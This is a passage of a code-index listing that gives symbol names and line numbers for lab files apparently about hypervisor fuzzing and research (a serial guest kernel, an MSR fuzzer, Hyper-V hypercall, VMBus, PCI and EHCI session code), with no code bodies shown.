type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab6/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab6/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab6/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab6/remotemem.py
class RemoteMemoryError (line 6) | class RemoteMemoryError(Exception):
class RemoteMemory (line 9) | class RemoteMemory:
method __init__ (line 10) | def __init__(self):
method add_region (line 14) | def add_region(self, base, size):
method del_region (line 19) | def del_region(self, base, size):
method alloc (line 24) | def alloc(self, size):
method free (line 33) | def free(self, address):
FILE: ch24/labs/lab7/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch24/labs/lab7/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab7/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab7/fuzzer.py
class OOBType (line 11) | class OOBType(Enum):
class Fuzzer (line 15) | class Fuzzer:
method __init__ (line 20) | def __init__(self, seed):
method timeout_handler (line 25) | def timeout_handler(signum, frame):
method context_save (line 28) | def context_save(self):
method context_restore (line 33) | def context_restore(self):
method code (line 38) | def code(self, code):
method fuzz (line 41) | def fuzz(self, reply):
method on_boot (line 44) | def on_boot(self, body):
method install_idt (line 48) | def install_idt(self, vectors=30):
method make_vector_handler (line 64) | def make_vector_handler(self, vec):
method handle_message (line 95) | def handle_message(self, msg_type, body):
method run (line 113) | def run(self):
FILE: ch24/labs/lab7/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 14) | def __init__(self):
method __enter__ (line 20) | def __enter__(self):
method __exit__ (line 27) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 30) | def _init_boot_info(self, symbols, mmap):
method messages (line 41) | def messages(self):
method op_write (line 51) | def op_write(self, code, address=None):
method op_exec (line 62) | def op_exec(self, address):
method op_commit (line 68) | def op_commit(self):
method execute (line 72) | def execute(self, code):
FILE: ch24/labs/lab7/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab7/msr_fuzzer.py
function ROR (line 57) | def ROR(x, n, bits):
class Fuzzer (line 60) | class Fuzzer(fuzzer.Fuzzer):
method __init__ (line 61) | def __init__(self, seed):
method flip_bits (line 65) | def flip_bits(self, data, bits):
method fuzz (line 70) | def fuzz(self, reply):
FILE: ch24/labs/lab7/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab7/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab7/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab7/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab7/remotemem.py
class RemoteMemoryError (line 6) | class RemoteMemoryError(Exception):
class RemoteMemory (line 9) | class RemoteMemory:
method __init__ (line 10) | def __init__(self):
method add_region (line 14) | def add_region(self, base, size):
method del_region (line 19) | def del_region(self, base, size):
method alloc (line 24) | def alloc(self, size):
method free (line 33) | def free(self, address):
FILE: ch25/labs/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch25/labs/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch25/labs/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch25/labs/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 16) | def __init__(self):
method __enter__ (line 22) | def __enter__(self):
method __exit__ (line 36) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 39) | def _init_boot_info(self, symbols, mmap):
method messages (line 50) | def messages(self):
method op_write_data (line 60) | def op_write_data(self, data, address=None):
method op_write (line 71) | def op_write(self, code, address=None):
method op_exec (line 77) | def op_exec(self, address):
method op_commit (line 83) | def op_commit(self):
method execute (line 87) | def execute(self, code):
FILE: ch25/labs/hypercall.py
class Session (line 40) | class Session(session.Session):
method __init__ (line 45) | def __init__(self):
method HvCallPostMessage (line 48) | def HvCallPostMessage(self, ConnectionId, MessageType, payload):
method HvCallSignalEvent (line 70) | def HvCallSignalEvent(self, ConnectionId, FlagNumber):
method dump_hc_page (line 91) | def dump_hc_page(self):
method on_boot (line 112) | def on_boot(self, body):
FILE: ch25/labs/hyperv_guest.py
function wsclient (line 29) | def wsclient():
class PseudoProc (line 39) | class PseudoProc:
method __init__ (line 40) | def __init__(self):
method kill (line 46) | def kill(self):
class Guest (line 50) | class Guest(guest.Guest):
method __enter__ (line 54) | def __enter__(self):
method __exit__ (line 94) | def __exit__(self, type, value, traceback):
class GuestGen1 (line 108) | class GuestGen1(Guest):
class GuestGen2 (line 111) | class GuestGen2(Guest):
FILE: ch25/labs/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 23) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 38) | static void put_mbi(const void *mbi) {
function op_write (line 59) | static void op_write() {
function op_exec (line 70) | static void op_exec() {
function kmain (line 76) | void kmain(const void *mbi) {
FILE: ch25/labs/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch25/labs/pci.py
class PciHeader (line 216) | class PciHeader:
method __init__ (line 217) | def __init__(self, regs):
method info (line 232) | def info(self):
method get_header_type (line 249) | def get_header_type(self):
class StandardHeader (line 252) | class StandardHeader(PciHeader):
method __init__ (line 253) | def __init__(self, regs):
method reg_nums (line 265) | def reg_nums(self):
class Pci2Pci (line 268) | class Pci2Pci(PciHeader):
method __init__ (line 269) | def __init__(self, regs):
class Cardbus (line 292) | class Cardbus(PciHeader):
method __init__ (line 293) | def __init__(self, regs):
class Bar (line 317) | class Bar:
method __init__ (line 318) | def __init__(self, reg_num, reg, size, reg_high):
class Session (line 333) | class Session(session.Session):
method __init__ (line 338) | def __init__(self, guest_cls):
method scan_pci (line 343) | def scan_pci(self):
method inject_read_bar_code (line 412) | def inject_read_bar_code(self):
method scan_device (line 481) | def scan_device(self, bus, slot, func, regs):
method print_bar_info (line 521) | def print_bar_info(self, bar):
method print_dev_info (line 524) | def print_dev_info(self, bus, slot, func, dev):
method on_boot (line 534) | def on_boot(self, body):
FILE: ch25/labs/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch25/labs/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch25/labs/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch25/labs/remotemem.py
class RemoteMemoryError (line 8) | class RemoteMemoryError(Exception):
class RemoteMemory (line 11) | class RemoteMemory:
method __init__ (line 12) | def __init__(self):
method add_region (line 16) | def add_region(self, base, size):
method del_region (line 21) | def del_region(self, base, size):
method alloc (line 26) | def alloc(self, size):
method free (line 35) | def free(self, address):
method free_all (line 39) | def free_all(self):
class PageAlloc (line 44) | class PageAlloc:
method __init__ (line 45) | def __init__(self, mem, data_len):
method start (line 54) | def start(self):
method end (line 57) | def end(self):
method size (line 60) | def size(self):
method page_list (line 63) | def page_list(self):
method free (line 66) | def free(self):
class Chunk (line 71) | class Chunk:
method __init__ (line 72) | def __init__(self, data, offset=None):
method __eq__ (line 76) | def __eq__(self, other):
method __lt__ (line 79) | def __lt__(self, other):
class IOVector (line 83) | class IOVector:
method __init__ (line 84) | def __init__(self, chunk_list=None):
method size (line 91) | def size(self):
method append (line 98) | def append(self, data, offset=None):
method iter (line 104) | def iter(self):
FILE: ch25/labs/session.py
class OOBType (line 10) | class OOBType(Enum):
class Session (line 14) | class Session:
method __init__ (line 19) | def __init__(self, guest_cls=Guest):
method timeout_handler (line 28) | def timeout_handler(signum, frame):
method context_save (line 31) | def context_save(self):
method context_restore (line 36) | def context_restore(self):
method code (line 41) | def code(self, code):
method execute (line 44) | def execute(self, code):
method fuzz (line 47) | def fuzz(self, reply):
method on_boot (line 50) | def on_boot(self, body):
method install_idt (line 54) | def install_idt(self, vectors=30):
method make_vector_handler (line 69) | def make_vector_handler(self, vec):
method is_oob (line 105) | def is_oob(self, msg_type, body):
method is_boot (line 121) | def is_boot(self, msg_type):
method next_message (line 124) | def next_message(self):
method run (line 132) | def run(self):
method run_loop (line 145) | def run_loop(self):
FILE: ch25/labs/time_sync.py
class ICMessageType (line 20) | class ICMessageType(Enum):
class Session (line 78) | class Session(vmbus.Session):
method negotiate (line 79) | def negotiate(self, msg):
method on_boot (line 106) | def on_boot(self, body):
FILE: ch25/labs/vmbus.py
class VmbusChannelMessage (line 12) | class VmbusChannelMessage(Enum):
class UUIDAdapter (line 56) | class UUIDAdapter(c.Adapter):
method _decode (line 57) | def _decode(self, obj, context, path):
method _encode (line 60) | def _encode(self, obj, context, path):
function gpa_range (line 135) | def gpa_range(address, size):
function gpa_range_size (line 144) | def gpa_range_size(range_list):
class PacketType (line 195) | class PacketType(Enum):
class Session (line 222) | class Session(hypercall.Session):
method synic_init (line 225) | def synic_init(self):
method synic_read_simp (line 263) | def synic_read_simp(self, SINT):
method synic_poll_simp (line 301) | def synic_poll_simp(self, SINT):
method vmbus_handle_message (line 309) | def vmbus_handle_message(self, msg):
method vmbus_read_message (line 327) | def vmbus_read_message(self):
method vmbus_initiate_contact (line 330) | def vmbus_initiate_contact(self):
method vmbus_handle_version_response (line 350) | def vmbus_handle_version_response(self, msg):
method vmbus_request_offers (line 359) | def vmbus_request_offers(self):
method vmbus_handle_offer (line 371) | def vmbus_handle_offer(self, msg):
method vmbus_handle_offers_delivered (line 383) | def vmbus_handle_offers_delivered(self, msg):
method vmbus_create_gpadl (line 387) | def vmbus_create_gpadl(self, child_relid, address, size):
method vmbus_handle_gpadl_created (line 428) | def vmbus_handle_gpadl_created(self, msg):
method vmbus_open_channel (line 433) | def vmbus_open_channel(self, child_relid):
method vmbus_handle_open_result (line 453) | def vmbus_handle_open_result(self, msg):
method vmbus_device_open (line 457) | def vmbus_device_open(self, if_instance=None, if_type=None, ring_size=...
method vmbus_init (line 473) | def vmbus_init(self):
method ringbuffer_init (line 484) | def ringbuffer_init(self, child_relid, address, size, offset_pages):
method ringbuffer_write (line 499) | def ringbuffer_write(self, ring_buffer, data):
method get_connection_id (line 552) | def get_connection_id(self, child_relid):
method ringbuffer_send_packet (line 559) | def ringbuffer_send_packet(self, child_relid, packet_type, data, trans...
method ringbuffer_read (line 589) | def ringbuffer_read(self, ring_buffer, data_len, update_index=True):
method ringbuffer_recv_packet (line 646) | def ringbuffer_recv_packet(self, child_relid):
method on_boot (line 657) | def on_boot(self, body):
FILE: ch26/labs/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch26/labs/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch26/labs/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch26/labs/cstruct.py
class CStruct (line 8) | class CStruct(c.Struct):
method __init__ (line 9) | def __init__(self, *subcons):
FILE: ch26/labs/ehci.py
class Session (line 14) | class Session(pci.Session):
method qtd_token (line 18) | def qtd_token(transfer_bytes, pid):
method qtd_single (line 24) | def qtd_single(token, data=None):
method qh_single (line 48) | def qh_single(qh, qtd):
method port_reset (line 61) | def port_reset(self):
method async_sched_stop (line 70) | def async_sched_stop(self):
method async_sched_run (line 83) | def async_sched_run(self, qh):
method run_single (line 98) | def run_single(self, token, qtd_data):
method request (line 113) | def request(req_type, request, value, index, length):
method setup (line 128) | def setup(self, request):
method usb_in (line 135) | def usb_in(self, data_len):
method usb_out (line 150) | def usb_out(self, data: IOVector):
method desc_string (line 161) | def desc_string(self, index):
method ehci_regs_base (line 179) | def ehci_regs_base(self):
method on_boot (line 191) | def on_boot(self, body):
FILE: ch26/labs/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 16) | def __init__(self):
method __enter__ (line 22) | def __enter__(self):
method __exit__ (line 36) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 39) | def _init_boot_info(self, symbols, mmap):
method messages (line 50) | def messages(self):
method op_write_data (line 60) | def op_write_data(self, data, address=None):
method op_write (line 71) | def op_write(self, code, address=None):
method op_exec (line 77) | def op_exec(self, address):
method op_commit (line 83) | def op_commit(self):
method execute (line 87) | def execute(self, code):
FILE: ch26/labs/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 23) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 38) | static void put_mbi(const void *mbi) {
function op_write (line 59) | static void op_write() {
function op_exec (line 70) | static void op_exec() {
function kmain (line 76) | void kmain(const void *mbi) {
FILE: ch26/labs/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch26/labs/pci.py
class PciHeader (line 216) | class PciHeader:
method __init__ (line 217) | def __init__(self, regs):
method info (line 232) | def info(self):
method get_header_type (line 249) | def get_header_type(self):
